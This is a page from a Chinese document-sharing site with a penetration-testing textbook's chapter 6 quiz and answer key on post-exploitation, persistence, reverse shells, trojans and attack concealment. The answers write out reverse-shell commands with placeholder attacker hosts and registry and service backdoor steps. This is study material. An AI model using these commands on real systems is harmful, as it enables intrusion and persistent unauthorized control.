网站大量收购闲置独家精品文档,联系QQ:2885784924

渗透测试技术-第六章习题及参考答案.docx

渗透测试技术-第六章习题及参考答案.docx

  1. 1、本文档共3页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多

第六章习题

一、单项选择题

1.在进行后渗透测试时,以下哪种操作不能帮助攻击者维持对目标系统的持久性控制?()

A.创建绑定Shell或反弹Shell B.创建调度任务

C.执行ARP扫描 D.创建新用户

2.以下哪种情况不适用于使用反弹Shell?()

A.目标机器因防火墙受限,只能发送请求,不能接收请求

B.目标机器端口被占用

C.目标机器处于公共网络,IP地址固定,攻击机器可以直接连接

D.对于病毒、木马,受害者何时能“中招”、对方的网络环境是什么样的、什么时候开关机等情况都是未知的

3.关于权限维持的描述,以下哪项是不正确的?()

A.权限维持是指攻击者在成功入侵系统后,为了保持对该系统的持久访问能力,使用各种技术和工具,绕过系统的安全机制

B.Windows的辅助功能镜像劫持是通过使用Windows内置的调试功能IFEO(ImageFileExecutionOptions)来实现的

C.在Windows权限维持中,启动项/服务后门和系统计划任务后门都需要攻击者获取系统管理员权限才能创建

D.在Linux权限维持中,Crontab计划任务后门是通过修改系统的/etc/crontab文件实现的

4.以下哪种类型的木马会模拟用户点击广告等行为来获取高额的广告推广费用?()

A.网游木马 B.网银木马 C.下载类木马 D.网页点击类木马

5.根据本章内容,下列叙述中错误的是()。

A.在网络攻击后,攻击者通常需要清除日志和操作记录,以隐藏其入侵痕迹

B.攻击者常用的隐匿方式之一是“肉鸡”和代理服务器混合组成的跳板链

C.Socks5代理服务器仅能响应HTTP通信协议,并过滤除80、8080等Web常用端口外的其他端口访问请求

D.Tor是许多攻击者用来隐藏自己的工具

二、简答题

1.请详细解释什么是后渗透,包括其目的、方法和在渗透测试中的重要性。说明在进行后渗透测试时,如何有效地隐藏攻击行为,避免被系统管理员和安全设备检测到。

2.请详细解释反弹Shell的工作原理,以及在Linux和Windows系统下如何使用反弹Shell。

3.简述Windows权限维持中启动项/服务后门的创建过程。

4.请简述木马的两个主要部分,并说明这两部分是如何协同工作的。

5.请简述网络攻击者是如何利用跳板来隐藏自己的行踪的。

参考答案

一、单项选择题

C.执行ARP扫描不能帮助攻击者维持对目标系统的持久性控制。

C.目标机器处于公共网络,IP地址固定,攻击机器可以直接连接的情况下,不适合使用反弹Shell。

C.在Windows权限维持中,启动项/服务后门和系统计划任务后门不一定需要系统管理员权限才能创建。

D.网页点击类木马会模拟用户点击广告行为来获取广告推广费用。

C.Socks5代理服务器不仅能响应HTTP协议,还可以处理其他协议,不会过滤除80、8080等Web常用端口外的其他端口访问请求。

二、简答题

1.后渗透

定义与目的:后渗透是指在成功入侵目标系统后,攻击者进行进一步操作的阶段,包括权限提升、信息收集、持久性控制等,目的是扩展控制、获取更多敏感信息。

方法:创建后门、调度任务、收集密码等操作;使用凭证窃取、横向移动等手段访问更多系统资源。

重要性:后渗透能够进一步加深攻击效果,同时确保攻击者可以长期控制目标系统,实现持久性。

隐藏攻击行为:隐藏文件、日志清除、使用代理或跳板、加密通信、伪装为合法进程或服务,绕过IDS/IPS等安全检测工具,减少痕迹暴露。

2.反弹Shell的工作原理

原理:反弹Shell是指目标主机主动连接攻击者的控制端,将其Shell或命令行环境反弹到控制端,适用于目标主机无法接受外部连接的情况。

在Linux系统中使用:通常通过bash-i/dev/tcp/攻击者IP/端口01实现,目标主机的Shell会连接攻击者监听的端口。

在Windows系统中使用:可利用nc.exe实现,命令如nc-ecmd.exe攻击者IP端口,使得Windows目标的cmd环境反弹到攻击者控制端。

3.Windows权限维持中启动项/服务后门的创建过程

创建启动项后门:在注册表的HKCU\Software\Microsoft\Windows\CurrentVersion\Run或HKLM\Software\Microsoft\Windows\CurrentVersion\Run中添加恶意程序路径,使得系统启动时自动执行。

创建服务后门:使用sccreate命令创建一个新的服务,将恶意程序作为服务添加到系统,服务启动时即可执行恶意代码。

4.木马的主要部分

控制端:攻击者端,用于发送指令、控制木马操作。

受控端(客户端):受害者

文档评论(0)

balala11 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档